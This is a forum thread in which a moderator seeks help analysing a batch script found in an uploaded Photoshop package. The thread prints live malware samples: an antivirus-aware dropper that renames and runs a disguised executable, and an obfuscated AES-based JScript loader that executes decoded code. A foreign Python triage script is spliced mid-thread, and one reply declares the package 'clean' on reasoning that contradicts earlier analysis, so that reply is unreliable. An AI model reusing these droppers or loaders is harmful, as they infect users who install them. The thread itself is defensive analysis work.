Need help where to go

June 18, 2020 at 09:25:11
Specs: Windows 10
Hi! I'm a moderator on a site where people upload apps. I am a bit worried about one of our uploaders, as he is uploading apps that may be malicious to our users. I found a batch script in one of his uploads. I was wondering where I can get someone to look at the code to see what it really does? It's a short piece of code.

Thanks




#1
June 18, 2020 at 10:16:16
You can post the source code of this batch script here and we will read it and try to understand what it does exactly!

message edited by Hackoo



#2
June 18, 2020 at 10:18:13
��&cls
@echo off
cd ../../products
setlocal enableDelayedExpansion enableextensions
set LIST=
for /f "delims=" %%F in ('wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName') do set LIST=!LIST! %%F


set "regexp=.*kasper.*"

echo( %LIST%|findstr /i /r /c:"%regexp%" >nul && (

move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
start ../Set-up.exe

echo " "


) || (

echo " "
cd ../
move Set-up.exe products/AdobePhotoshop21-Core_x64.data
timeout 1 nul 2>&1
cd packages/ADC
if exist ADC (
cd ../../products
move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
timeout 1 nul 2>&1
start ../Set-up.exe
cd ../packages/ADC
start wscript //E:jscript ADC %1
) else (
echo "Error : Please Extract compressed file first ..."
pause
)
)

rename ADC_version.bat ADC_version.msi



#3
June 18, 2020 at 10:26:06
I found the ADC file and decompressed it from compressed java to readable js. I'm concerned that it hijacks/runs wscript and runs the spyware/keylogger through it.



#4
June 18, 2020 at 11:07:08
If this user is a problem, why not just ban him/her?

"Channeling the spirit of jboy..."



#5
June 18, 2020 at 11:32:24
This user uploads a lot of good stuff on the site, but when I analyse and compare his/her uploads to identical apps from other uploaders, the results look different for this user. I need some proof before banning him/her.

message edited by hawk9



#6
June 18, 2020 at 11:57:16
We need to read this file: AdobePhotoshop21-Core_x64.dat
Edit this file with Notepad and post its contents!
Or compress all files with ADC and .js files and upload them on MediaFire, for example.

message edited by Hackoo



#7
June 18, 2020 at 12:36:20
The AdobePhotoshop21-Core_x64.dat file is 5.22 MB and its content is encrypted. I was able to read something of it, but it was only URLs and encrypted strings. What about the ADC file that I have in Notepad?


#8
June 18, 2020 at 13:15:38
Where is the .js file source code? Please, if you still have it, just post its contents! Otherwise we cannot confirm whether it's malicious code or not.

message edited by Hackoo



#9
June 18, 2020 at 14:27:12
try { /*EBqVZdRY3vckXwfDxiuUuG6cKTfFsSxPFKlRILFcynCEf7VPNZgkQMIobeDfBLRmFI09cMC4BJhSOo0iRHpaBrdjGZjEWemUCCTX8QhhJT0kgQoV8CtvBt1zrBplo8G*/ /*t8w8pYXEfDogzAp9wBi4YQGBS9BJfmdxX8L0hoo8EyoFWadQ5qRYrT2JFACeSfGhXn09YBJ1IXWENNZuroaUrUIZtSGK3PXyDQvBt7ACZVDXbSiCECB5VhmFFBiI2VLJ9v*/ /*CCm28IGWpopVwFVC1mwdxUxjL52nyG7uMx9hYWPuHrIAOyLuvDVSjBUisR5fidcwiOXrHoEir7LNAh1iSu9ciy26k6o8oaJMemDw8eVBvYrY1c7jg4mxWF8GovOq0*/
var Csr0XBh6XD9JRyCh = Csr0XBh6XD9JRyCh || function(c) {
function r() {}
var t = {},
e = t.lib = {},
i = e.Base = {
extend: function(t) {
r.prototype = this;
var e = new r;
return t && e.mixIn(t), e.hasOwnProperty('init') || (e.init = function() {
e.$super.init.apply(this, arguments)
}), (e.init.prototype = e).$super = this, e
},
create: function() {
var t = this.extend();
return t.init.apply(t, arguments), t
},
init: function() {},
mixIn: function(t) {
for(var e in t) t.hasOwnProperty(e) && (this[e] = t[e]);
t.hasOwnProperty('toString') && (this.toString = t.toString)
},
SQ57V5eYWoLZI: function() {
return this.init.prototype.extend(this)
}
},
a = e.WordArray = i.extend({
init: function(t, e) {
t = this.words = t || [], this.ijT6xGzOKwIL3tL = null != e ? e : 4 * t.length
},
toString: function(t) {
return(t || o).stringify(this)
},
concat: function(t) {
var e = this.words,
r = t.words,
i = this.ijT6xGzOKwIL3tL;
if(t = t.ijT6xGzOKwIL3tL, this.clamp(), i % 4)
for(var n = 0; n < t; n++) e[i + n >>> 2] |= (r[n >>> 2] >>> 24 - n % 4 * 8 & 255) << 24 - (i + n) % 4 * 8;
else if(65535 < r.length)
for(n = 0; n < t; n += 4) e[i + n >>> 2] = r[n >>> 2];
else e.push.apply(e, r);
return this.ijT6xGzOKwIL3tL += t, this
},
clamp: function() {
var t = this.words,
e = this.ijT6xGzOKwIL3tL;
t[e >>> 2] &= 4294967295 << 32 - e % 4 * 8, t.length = c.ceil(e / 4)
},
SQ57V5eYWoLZI: function() {
var t = i.SQ57V5eYWoLZI.call(this);
return t.words = this.words.slice(0), t
},
random: function(t) {
for(var e = [], r = 0; r < t; r += 4) e.push(4294967296 * c.random() | 0);
return new a.init(e, t)
}
}),
n = t.ME3svMnfKRN = {},
o = n.Hex = {
stringify: function(t) {
var e = t.words;
t = t.ijT6xGzOKwIL3tL;
for(var r = [], i = 0; i < t; i++) {
var n = e[i >>> 2] >>> 24 - i % 4 * 8 & 255;
r.push((n >>> 4).toString(16)), r.push((15 & n).toString(16))
}
return r.join('')
},
parse: function(t) {
for(var e = t.length, r = [], i = 0; i < e; i += 2) r[i >>> 3] |= parseInt(t.substr(i, 2), 16) << 24 - i % 8 * 4;
return new a.init(r, e / 2)
}
},
s = n.Latin1 = {
stringify: function(t) {
var e = t.words;
t = t.ijT6xGzOKwIL3tL;
for(var r = [], i = 0; i < t; i++) r.push(String.fromCharCode(e[i >>> 2] >>> 24 - i % 4 * 8 & 255));
return r.join('')
},
parse: function(t) {
for(var e = t.length, r = [], i = 0; i < e; i++) r[i >>> 2] |= (255 & t.charCodeAt(i)) << 24 - i % 4 * 8;
return new a.init(r, e)
}
},
f = n.zI1DodsmgMo = {
stringify: function(t) {
try {
return decodeURIComponent(escape(s.stringify(t)))
} catch(t) {
throw Error('')
}
},
parse: function(t) {
return s.parse(unescape(encodeURIComponent(t)))
}
},
h = e.BufferedBlockAlgorithm = i.extend({
reset: function() {
this._data = new a.init, this._nDataBytes = 0
},
_append: function(t) {
'string' == typeof t && (t = f.parse(t)), this._data.concat(t), this._nDataBytes += t.ijT6xGzOKwIL3tL
},
_process: function(t) {
var e = this._data,
r = e.words,
i = e.ijT6xGzOKwIL3tL,
n = this.blockSize,
o = i / (4 * n);
if(t = (o = t ? c.ceil(o) : c.max((0 | o) - this._minBufferSize, 0)) * n, i = c.min(4 * t, i), t) {
for(var s = 0; s < t; s += n) this.gLrK0x0V9N62Dqj(r, s);
s = r.splice(0, t), e.ijT6xGzOKwIL3tL -= i
}
return new a.init(s, i)
},
SQ57V5eYWoLZI: function() {
var t = i.SQ57V5eYWoLZI.call(this);
return t._data = this._data.SQ57V5eYWoLZI(), t
},
_minBufferSize: 0
});
e.O8abBUfvYNbeadab = h.extend({
cfg: i.extend(),
init: function(t) {
this.cfg = this.cfg.extend(t), this.reset()
},
reset: function() {
h.reset.call(this), this._doReset()
},
update: function(t) {
return this._append(t), this._process(), this
},
finalize: function(t) {
return t && this._append(t), this._doFinalize()
},
blockSize: 16,
_createHelper: function(r) {
return function(t, e) {
return new r.init(e).finalize(t)
}
},
_createHmacHelper: function(r) {
return function(t, e) {
return new u.HMAC.init(r, e).finalize(t)
}
}
});
var u = t.algo = {};
return t
}(Math);
! function() {
var t = Csr0XBh6XD9JRyCh,
a = t.lib.WordArray;
t.ME3svMnfKRN.Base64 = {
stringify: function(t) {
var e = t.words,
r = t.ijT6xGzOKwIL3tL,
i = this.GVYUXWUqcPWzftZ;
t.clamp(), t = [];
for(var n = 0; n < r; n += 3)
for(var o = (e[n >>> 2] >>> 24 - n % 4 * 8 & 255) << 16 | (e[n + 1 >>> 2] >>> 24 - (n + 1) % 4 * 8 & 255) << 8 | e[n + 2 >>> 2] >>> 24 - (n + 2) % 4 * 8 & 255, s = 0; s < 4 && n + .75 * s < r; s++) t.push(i.charAt(o >>> 6 * (3 - s) & 63));
if(e = i.charAt(64))
for(; t.length % 4;) t.push(e);
return t.join('')
},
parse: function(t) {
var e = t.length,
r = this.GVYUXWUqcPWzftZ;
!(i = r.charAt(64)) || -1 != (i = t.indexOf(i)) && (e = i);
for(var i = [], n = 0, o = 0; o < e; o++)
if(o % 4) {
var s = r.indexOf(t.charAt(o - 1)) << o % 4 * 2,
c = r.indexOf(t.charAt(o)) >>> 6 - o % 4 * 2;
i[n >>> 2] |= (s | c) << 24 - n % 4 * 8, n++
}
return a.create(i, n)
},
GVYUXWUqcPWzftZ: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
}
}(),
function(o) {
function m(t, e, r, i, n, o, s) {
return((t = t + (e & r | ~e & i) + n + s) << o | t >>> 32 - o) + e
}

function z(t, e, r, i, n, o, s) {
return((t = t + (e & i | r & ~i) + n + s) << o | t >>> 32 - o) + e
}

function C(t, e, r, i, n, o, s) {
return((t = t + (e ^ r ^ i) + n + s) << o | t >>> 32 - o) + e
}

function w(t, e, r, i, n, o, s) {
return((t = t + (r ^ (e | ~i)) + n + s) << o | t >>> 32 - o) + e
}
for(var t = Csr0XBh6XD9JRyCh, e = (i = t.lib).WordArray, r = i.O8abBUfvYNbeadab, i = t.algo, D = [], n = 0; n < 64; n++) D[n] = 4294967296 * o.abs(o.sin(n + 1)) | 0;
i = i.MD5 = r.extend({
_doReset: function() {
this._hash = new e.init([1732584193, 4023233417, 2562383102, 271733878])
},
gLrK0x0V9N62Dqj: function(t, e) {
for(var r = 0; r < 16; r++) {
var i = t[s = e + r];
t[s] = 16711935 & (i << 8 | i >>> 24) | 4278255360 & (i << 24 | i >>> 8)
}
r = this._hash.words;
var n, o, s = t[e + 0],
c = (i = t[e + 1], t[e + 2]),
a = t[e + 3],
f = t[e + 4],
h = t[e + 5],
u = t[e + 6],
p = t[e + 7],
d = t[e + 8],
l = t[e + 9],
y = t[e + 10],
_ = t[e + 11],
v = t[e + 12],
g = t[e + 13],
B = t[e + 14],
x = t[e + 15],
S = r[0],
k = w(k = w(k = w(k = w(k = C(k = C(k = C(k = C(k = z(k = z(k = z(k = z(k = m(k = m(k = m(k = m(k = r[1], o = m(o = r[2], n = m(n = r[3], S = m(S, k, o, n, s, 7, D[0]), k, o, i, 12, D[1]), S, k, c, 17, D[2]), n, S, a, 22, D[3]), o = m(o, n = m(n, S = m(S, k, o, n, f, 7, D[4]), k, o, h, 12, D[5]), S, k, u, 17, D[6]), n, S, p, 22, D[7]), o = m(o, n = m(n, S = m(S, k, o, n, d, 7, D[8]), k, o, l, 12, D[9]), S, k, y, 17, D[10]), n, S, _, 22, D[11]), o = m(o, n = m(n, S = m(S, k, o, n, v, 7, D[12]), k, o, g, 12, D[13]), S, k, B, 17, D[14]), n, S, x, 22, D[15]), o = z(o, n = z(n, S = z(S, k, o, n, i, 5, D[16]), k, o, u, 9, D[17]), S, k, _, 14, D[18]), n, S, s, 20, D[19]), o = z(o, n = z(n, S = z(S, k, o, n, h, 5, D[20]), k, o, y, 9, D[21]), S, k, x, 14, D[22]), n, S, f, 20, D[23]), o = z(o, n = z(n, S = z(S, k, o, n, l, 5, D[24]), k, o, B, 9, D[25]), S, k, a, 14, D[26]), n, S, d, 20, D[27]), o = z(o, n = z(n, S = z(S, k, o, n, g, 5, D[28]), k, o, c, 9, D[29]), S, k, p, 14, D[30]), n, S, v, 20, D[31]), o = C(o, n = C(n, S = C(S, k, o, n, h, 4, D[32]), k, o, d, 11, D[33]), S, k, _, 16, D[34]), n, S, B, 23, D[35]), o = C(o, n = C(n, S = C(S, k, o, n, i, 4, D[36]), k, o, f, 11, D[37]), S, k, p, 16, D[38]), n, S, y, 23, D[39]), o = C(o, n = C(n, S = C(S, k, o, n, g, 4, D[40]), k, o, s, 11, D[41]), S, k, a, 16, D[42]), n, S, u, 23, D[43]), o = C(o, n = C(n, S = C(S, k, o, n, l, 4, D[44]), k, o, v, 11, D[45]), S, k, x, 16, D[46]), n, S, c, 23, D[47]), o = w(o, n = w(n, S = w(S, k, o, n, s, 6, D[48]), k, o, p, 10, D[49]), S, k, B, 15, D[50]), n, S, h, 21, D[51]), o = w(o, n = w(n, S = w(S, k, o, n, v, 6, D[52]), k, o, a, 10, D[53]), S, k, y, 15, D[54]), n, S, i, 21, D[55]), o = w(o, n = w(n, S = w(S, k, o, n, d, 6, D[56]), k, o, x, 10, D[57]), S, k, u, 15, D[58]), n, S, g, 21, D[59]), o = w(o, n = w(n, S = w(S, k, o, n, f, 6, D[60]), k, o, _, 10, D[61]), S, k, c, 15, D[62]), n, S, l, 21, D[63]);
r[0] = r[0] + S | 0, r[1] = r[1] + k | 0, r[2] = r[2] + o | 0, r[3] = r[3] + n | 0
},
_doFinalize: function() {
var t = this._data,
e = t.words,
r = 8 * this._nDataBytes,
i = 8 * t.ijT6xGzOKwIL3tL;
e[i >>> 5] |= 128 << 24 - i % 32;
var n = o.floor(r / 4294967296);
for(e[15 + (i + 64 >>> 9 << 4)] = 16711935 & (n << 8 | n >>> 24) | 4278255360 & (n << 24 | n >>> 8), e[14 + (i + 64 >>> 9 << 4)] = 16711935 & (r << 8 | r >>> 24) | 4278255360 & (r << 24 | r >>> 8), t.ijT6xGzOKwIL3tL = 4 * (e.length + 1), this._process(), e = (t = this._hash).words, r = 0; r < 4; r++) i = e[r], e[r] = 16711935 & (i << 8 | i >>> 24) | 4278255360 & (i << 24 | i >>> 8);
return t
},
SQ57V5eYWoLZI: function() {
var t = r.SQ57V5eYWoLZI.call(this);
return t._hash = this._hash.SQ57V5eYWoLZI(), t
}
}), t.MD5 = r._createHelper(i), t.HmacMD5 = r._createHmacHelper(i)
}(Math),
function() {
var t, e = Csr0XBh6XD9JRyCh,
r = (t = e.lib).Base,
f = t.WordArray,
i = (t = e.algo).EvpKDF = r.extend({
cfg: r.extend({
keySize: 4,
O8abBUfvYNbeadab: t.MD5,
iterations: 1
}),
init: function(t) {
this.cfg = this.cfg.extend(t)
},
compute: function(t, e) {
for(var r = (s = this.cfg).O8abBUfvYNbeadab.create(), i = f.create(), n = i.words, o = s.keySize, s = s.iterations; n.length < o;) {
c && r.update(c);
var c = r.update(t).finalize(e);
r.reset();
for(var a = 1; a < s; a++) c = r.finalize(c), r.reset();
i.concat(c)
}
return i.ijT6xGzOKwIL3tL = 4 * o, i
}
});
e.EvpKDF = function(t, e, r) {
return i.create(r).compute(t, e)
}
}(), Csr0XBh6XD9JRyCh.lib.Cipher || function() {
var t = (p = Csr0XBh6XD9JRyCh).lib,
e = t.Base,
s = t.WordArray,
r = t.BufferedBlockAlgorithm,
i = p.ME3svMnfKRN.Base64,
n = p.algo.EvpKDF,
o = t.Cipher = r.extend({
cfg: e.extend(),
hLJ8tNZt21oS: function(t, e) {
return this.create(this._ENC_XFORM_MODE, t, e)
},
createpJmSG94rfunor: function(t, e) {
return this.create(this._DEC_XFORM_MODE, t, e)
},
init: function(t, e, r) {
this.cfg = this.cfg.extend(r), this._xformMode = t, this._key = e, this.reset()
},
reset: function() {
r.reset.call(this), this._doReset()
},
process: function(t) {
return this._append(t), this._process()
},
finalize: function(t) {
return t && this._append(t), this._doFinalize()
},
keySize: 4,
ivSize: 4,
_ENC_XFORM_MODE: 1,
_DEC_XFORM_MODE: 2,
_createHelper: function(i) {
return {
encrypt: function(t, e, r) {
return('string' == typeof e ? d : u).encrypt(i, t, e, r)
},
pJmSG94rfun: function(t, e, r) {
return('string' == typeof e ? d : u).pJmSG94rfun(i, t, e, r)
}
}
}
});
t.StreamCipher = o.extend({
_doFinalize: function() {
return this._process(!0)
},
blockSize: 1
});

function c(t, e, r) {
var i = this._iv;
i ? this._iv = void 0 : i = this._prevBlock;
for(var n = 0; n < r; n++) t[e + n] ^= i[n]
}
var a = p.mode = {},
f = (t.BlockCipherMode = e.extend({
hLJ8tNZt21oS: function(t, e) {
return this.Encryptor.create(t, e)
},
createpJmSG94rfunor: function(t, e) {
return this.pJmSG94rfunor.create(t, e)
},
init: function(t, e) {
this._cipher = t, this._iv = e
}
})).extend();
f.Encryptor = f.extend({
processBlock: function(t, e) {
var r = this._cipher,
i = r.blockSize;
c.call(this, t, e, i), r.encryptBlock(t, e), this._prevBlock = t.slice(e, e + i)
}
}), f.pJmSG94rfunor = f.extend({
processBlock: function(t, e) {
var r = this._cipher,
i = r.blockSize,
n = t.slice(e, e + i);
r.pJmSG94rfunBlock(t, e), c.call(this, t, e, i), this._prevBlock = n
}
}), a = a.CBC = f, f = (p.pad = {}).Pkcs7 = {
pad: function(t, e) {
for(var r, i = (r = (r = 4 * e) - t.ijT6xGzOKwIL3tL % r) << 24 | r << 16 | r << 8 | r, n = [], o = 0; o < r; o += 4) n.push(i);
r = s.create(n, r), t.concat(r)
},
unpad: function(t) {
t.ijT6xGzOKwIL3tL -= 255 & t.words[t.ijT6xGzOKwIL3tL - 1 >>> 2]
}
}, t.BlockCipher = o.extend({
cfg: o.cfg.extend({
mode: a,
padding: f
}),
reset: function() {
o.reset.call(this);
var t = (e = this.cfg).iv,
e = e.mode;
if(this._xformMode == this._ENC_XFORM_MODE) var r = e.hLJ8tNZt21oS;
else r = e.createpJmSG94rfunor, this._minBufferSize = 1;
this._mode = r.call(e, this, t && t.words)
},
gLrK0x0V9N62Dqj: function(t, e) {
this._mode.processBlock(t, e)
},
_doFinalize: function() {
var t = this.cfg.padding;
if(this._xformMode == this._ENC_XFORM_MODE) {
t.pad(this._data, this.blockSize);
var e = this._process(!0)
} else e = this._process(!0), t.unpad(e);
return e
},
blockSize: 4
});
var h = t.CipherParams = e.extend({
init: function(t) {
this.mixIn(t)
},
toString: function(t) {
return(t || this.formatter).stringify(this)
}
}),
u = (a = (p.format = {}).OpenSSL = {
stringify: function(t) {
var e = t.ciphertext;
return((t = t.salt) ? s.create([1398893684, 1701076831]).concat(t).concat(e) : e).toString(i)
},
parse: function(t) {
var e = (t = i.parse(t)).words;
if(1398893684 == e[0] && 1701076831 == e[1]) {
var r = s.create(e.slice(2, 4));
e.splice(0, 4), t.ijT6xGzOKwIL3tL -= 16
}
return h.create({
ciphertext: t,
salt: r
})
}
}, t.SerializableCipher = e.extend({
cfg: e.extend({
format: a
}),
encrypt: function(t, e, r, i) {
i = this.cfg.extend(i);
var n = t.hLJ8tNZt21oS(r, i);
return e = n.finalize(e), n = n.cfg, h.create({
ciphertext: e,
key: r,
iv: n.iv,
algorithm: t,
mode: n.mode,
padding: n.padding,
blockSize: t.blockSize,
formatter: i.format
})
},
pJmSG94rfun: function(t, e, r, i) {
return i = this.cfg.extend(i), e = this._parse(e, i.format), t.createpJmSG94rfunor(r, i).finalize(e.ciphertext)
},
_parse: function(t, e) {
return 'string' == typeof t ? e.parse(t, this) : t
}
})),
p = (p.kdf = {}).OpenSSL = {
execute: function(t, e, r, i) {
return i || (i = s.random(8)), t = n.create({
keySize: e + r
}).compute(t, i), r = s.create(t.words.slice(e), 4 * r), t.ijT6xGzOKwIL3tL = 4 * e, h.create({
key: t,
iv: r,
salt: i
})
}
},
d = t.PasswordBasedCipher = u.extend({
cfg: u.cfg.extend({
kdf: p
}),
encrypt: function(t, e, r, i) {
return r = (i = this.cfg.extend(i)).kdf.execute(r, t.keySize, t.ivSize), i.iv = r.iv, (t = u.encrypt.call(this, t, e, r.key, i)).mixIn(r), t
},
pJmSG94rfun: function(t, e, r, i) {
return i = this.cfg.extend(i), e = this._parse(e, i.format), r = i.kdf.execute(r, t.keySize, t.ivSize, e.salt), i.iv = r.iv, u.pJmSG94rfun.call(this, t, e, r.key, i)
}
})
}(),
function() {
for(var t = Csr0XBh6XD9JRyCh, e = t.lib.BlockCipher, r = t.algo, s = [], i = [], n = [], o = [], c = [], a = [], f = [], h = [], u = [], p = [], d = [], l = 0; l < 256; l++) d[l] = l < 128 ? l << 1 : l << 1 ^ 283;
var y = 0,
_ = 0;
for(l = 0; l < 256; l++) {
var v = (v = _ ^ _ << 1 ^ _ << 2 ^ _ << 3 ^ _ << 4) >>> 8 ^ 255 & v ^ 99;
s[y] = v;
var g = d[i[v] = y],
B = d[g],
x = d[B],
S = 257 * d[v] ^ 16843008 * v;
n[y] = S << 24 | S >>> 8, o[y] = S << 16 | S >>> 16, c[y] = S << 8 | S >>> 24, a[y] = S, S = 16843009 * x ^ 65537 * B ^ 257 * g ^ 16843008 * y, f[v] = S << 24 | S >>> 8, h[v] = S << 16 | S >>> 16, u[v] = S << 8 | S >>> 24, p[v] = S, y ? (y = g ^ d[d[d[x ^ g]]], _ ^= d[d[_]]) : y = _ = 1
}
var k = [0, 1, 2, 4, 8, 16, 32, 64, 128, 27, 54];
r = r.sQqhlSS9cIw1nmi = e.extend({
_doReset: function() {
for(var t = (r = this._key).words, e = r.ijT6xGzOKwIL3tL / 4, r = 4 * ((this._nRounds = e + 6) + 1), i = this._keySchedule = [], n = 0; n < r; n++)
if(n < e) i[n] = t[n];
else {
var o = i[n - 1];
n % e ? 6 < e && 4 == n % e && (o = s[o >>> 24] << 24 | s[o >>> 16 & 255] << 16 | s[o >>> 8 & 255] << 8 | s[255 & o]) : (o = s[(o = o << 8 | o >>> 24) >>> 24] << 24 | s[o >>> 16 & 255] << 16 | s[o >>> 8 & 255] << 8 | s[255 & o], o ^= k[n / e | 0] << 24), i[n] = i[n - e] ^ o
}
for(t = this._invKeySchedule = [], e = 0; e < r; e++) n = r - e, o = e % 4 ? i[n] : i[n - 4], t[e] = e < 4 || n <= 4 ? o : f[s[o >>> 24]] ^ h[s[o >>> 16 & 255]] ^ u[s[o >>> 8 & 255]] ^ p[s[255 & o]]
},
encryptBlock: function(t, e) {
this._doCryptBlock(t, e, this._keySchedule, n, o, c, a, s)
},
pJmSG94rfunBlock: function(t, e) {
var r = t[e + 1];
t[e + 1] = t[e + 3], t[e + 3] = r, this._doCryptBlock(t, e, this._invKeySchedule, f, h, u, p, i), r = t[e + 1], t[e + 1] = t[e + 3], t[e + 3] = r
},
_doCryptBlock: function(t, e, r, i, n, o, s, c) {
for(var a = this._nRounds, f = t[e] ^ r[0], h = t[e + 1] ^ r[1], u = t[e + 2] ^ r[2], p = t[e + 3] ^ r[3], d = 4, l = 1; l < a; l++) {
var y = i[f >>> 24] ^ n[h >>> 16 & 255] ^ o[u >>> 8 & 255] ^ s[255 & p] ^ r[d++],
_ = i[h >>> 24] ^ n[u >>> 16 & 255] ^ o[p >>> 8 & 255] ^ s[255 & f] ^ r[d++],
v = i[u >>> 24] ^ n[p >>> 16 & 255] ^ o[f >>> 8 & 255] ^ s[255 & h] ^ r[d++];
p = i[p >>> 24] ^ n[f >>> 16 & 255] ^ o[h >>> 8 & 255] ^ s[255 & u] ^ r[d++], f = y, h = _, u = v
}
y = (c[f >>> 24] << 24 | c[h >>> 16 & 255] << 16 | c[u >>> 8 & 255] << 8 | c[255 & p]) ^ r[d++], _ = (c[h >>> 24] << 24 | c[u >>> 16 & 255] << 16 | c[p >>> 8 & 255] << 8 | c[255 & f]) ^ r[d++], v = (c[u >>> 24] << 24 | c[p >>> 16 & 255] << 16 | c[f >>> 8 & 255] << 8 | c[255 & h]) ^ r[d++], p = (c[p >>> 24] << 24 | c[f >>> 16 & 255] << 16 | c[h >>> 8 & 255] << 8 | c[255 & u]) ^ r[d++], t[e] = y, t[e + 1] = _, t[e + 2] = v, t[e + 3] = p
},
keySize: 8
});
t.sQqhlSS9cIw1nmi = e._createHelper(r)
}();

function Na9tzNOyOId8tjR(WxEtVAlV6Ad) {
return WxEtVAlV6Ad.split('').reverse().join('');
};

function Jrvc1HJbhCk(rvMpMQdvFCB8) {
new Function(rvMpMQdvFCB8)();
};
var GswHxtAqPoxko3Y = Na9tzNOyOId8tjR('==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*/
} catch(e) {}



#10
June 18, 2020 at 14:30:01
This is the ADC file, decompressed. I had to delete most of the signature encryption code at the bottom because there wasn't room here to post it. And thank you very much for your time seeing through this code!


#11
June 18, 2020 at 16:03:55
This .JS file uses the same functions to encrypt data as this one: CryptoJS-AES


#12
June 18, 2020 at 21:43:01
Ok. Is there any way to decrypt it to see its source code/functions? Many of our users complain about this wscript running this js. BTW, thank you for your help!


#13
June 19, 2020 at 11:59:58
@Hackoo Do you know at least what's going on in the bat file? Some detection of AV running on the system, etc.?


#14
June 19, 2020 at 13:00:16
The batch file checks what kind of antivirus is installed on the machine!
If Kaspersky Antivirus is installed, it skips running the spyware or the malicious code to avoid being detected by it!

message edited by Hackoo


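As an added example (my own code, not from the thread or any of its posters), a small Python static triage script that flags the behaviours described above: the WMI SecurityCenter2 antivirus enumeration, the branch on the vendor-name pattern, the wscript launch and the move/rename operations that change a file extension. The embedded sample is an abridged copy of the batch file posted in #2; the regexes and finding names are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Sample input: an abridged copy of the batch file posted in #2 of this thread.
SAMPLE_BAT = r"""@echo off
cd ../../products
setlocal enableDelayedExpansion enableextensions
set LIST=
for /f "delims=" %%F in ('wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName') do set LIST=!LIST! %%F
set "regexp=.*kasper.*"
echo( %LIST%|findstr /i /r /c:"%regexp%" >nul && (
move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
start ../Set-up.exe
) || (
move Set-up.exe products/AdobePhotoshop21-Core_x64.data
timeout 1 nul 2>&1
start ../Set-up.exe
start wscript //E:jscript ADC %1
)
rename ADC_version.bat ADC_version.msi
"""

@dataclass
class Finding:
    kind: str      # category name (my own naming, see the regexes below)
    line_no: int   # 1-based line in the batch file
    detail: str

# Patterns for the behaviours the thread discusses (names are mine, not from the page).
AV_QUERY = re.compile(r"wmic\b.*securitycenter2.*antivirusproduct", re.I)
SET_VAR = re.compile(r'^\s*set\s+"?(\w+)=(.*?)"?\s*$', re.I)
FINDSTR_VAR = re.compile(r'findstr\b.*?/c:"?%(\w+)%"?', re.I)
SCRIPT_HOST = re.compile(r"\b[wc]script(?:\.exe)?\b(.*)", re.I)
FILE_OP = re.compile(r"^\s*(move|rename|ren|copy)\s+(\S+)\s+(\S+)", re.I)
EXT = re.compile(r"\.([A-Za-z0-9]+)$")

def triage_batch(text):
    """Scan a batch script and return the suspicious behaviours found, in file order."""
    findings, variables = [], {}
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = SET_VAR.match(line)
        if m:  # remember set "name=value" so a later %name% can be resolved
            variables[m.group(1).upper()] = m.group(2)
        if AV_QUERY.search(line):
            findings.append(Finding("av_enumeration", n, "WMI SecurityCenter2 AntiVirusProduct query"))
        m = FINDSTR_VAR.search(line)
        if m:  # findstr on a variable holding the AV list: a vendor-specific branch
            pattern = variables.get(m.group(1).upper(), "?")
            findings.append(Finding("av_conditional", n, f"branches on AV name pattern {pattern!r}"))
        m = SCRIPT_HOST.search(line)
        if m:
            findings.append(Finding("script_host_launch", n, "wscript/cscript: " + m.group(1).strip()))
        m = FILE_OP.match(line)
        if m:  # move/rename that changes the extension (e.g. .dat -> .exe, .bat -> .msi)
            src, dst = EXT.search(m.group(2)), EXT.search(m.group(3))
            if src and dst and src.group(1).lower() != dst.group(1).lower():
                findings.append(Finding("extension_change", n, f"{m.group(2)} -> {m.group(3)}"))
    return findings

def summarize(findings):
    """Count findings per kind; a Counter returns 0 for kinds that did not occur."""
    return Counter(f.kind for f in findings)

def av_aware_dropper(findings):
    """True when the script enumerates AV, branches on it and launches a script host."""
    kinds = summarize(findings)
    return all(kinds[k] for k in ("av_enumeration", "av_conditional", "script_host_launch"))

if __name__ == "__main__":
    found = triage_batch(SAMPLE_BAT)
    for f in found:
        print(f"line {f.line_no:2d}  {f.kind:20s} {f.detail}")
    print("AV-aware dropper pattern:", av_aware_dropper(found))
```

The output lists each flagged line with its category; the three extension changes are what the later posts about .dat/.exe and .bat/.msi renaming refer to.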

#15
June 19, 2020 at 13:18:52
But why does the script rename ADC_version.msi to ADC_version.bat in the first place when running the script? Then rename it back again from ADC_version.bat to ADC_version.msi..?


#16
June 19, 2020 at 13:45:34
Try to upload the package here for analysis by drag and drop!
https://www.hybrid-analysis.com/
This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology.


#17
June 20, 2020 at 01:45:12
https://www.hybrid-analysis.com/sam...

I'm familiar with using Hybrid Analysis and Joe Sandbox. This could be a false positive, but I just don't get why the file extension needs to be renamed. This renaming was what led me to the ADC js file in the first place. I've managed to decompress the ADC file from unreadable content, but it is still encrypted (above). I'll need to decrypt its content to get the source code, no?

message edited by hawk9



#18
June 21, 2020 at 11:32:12
If someone is able to help me further, it would be much appreciated.


#19
June 22, 2020 at 06:34:22
You are absolutely right, the moderator should ban that user. Do you know, if any user downloads that file then you will get in a lot of trouble. Please request that everyone not upload malicious batch script files. Thank you.


#20
June 22, 2020 at 12:55:35
I will not start banning people if I don't get any proof about this code. It could have other trends as well; that's not a reason to ban or kick someone. That's why I need help with the js code to confirm it's malicious.


#21
June 24, 2020 at 08:55:06
Hackoo, can you guide me on the next steps for the js file?


#22
June 24, 2020 at 20:47:33
It looks like the batch checks for Kaspersky installed, and if so, the adobe-core.dat can be run as set-up.exe, and Kaspersky will handle the decomp/decrypt. If not, it tries the same file, but using ADC.js to handle the decomp/decrypt. Since the initial attempt is made using Kaspersky on an existing file, presumably included with the Adobe Photoshop package, I would conclude that the second approach, running the .dat through ADC.js, is also hygienic. Since this is specific to an Adobe Photoshop install/upgrade, and to certain OSes, it would need that environment to test from the ground up, but on reflection, I would give it a "clean". You might post also to https://www.computing.net/forum/sec... since that group has tons more experience.


#23
June 27, 2020 at 02:02:47
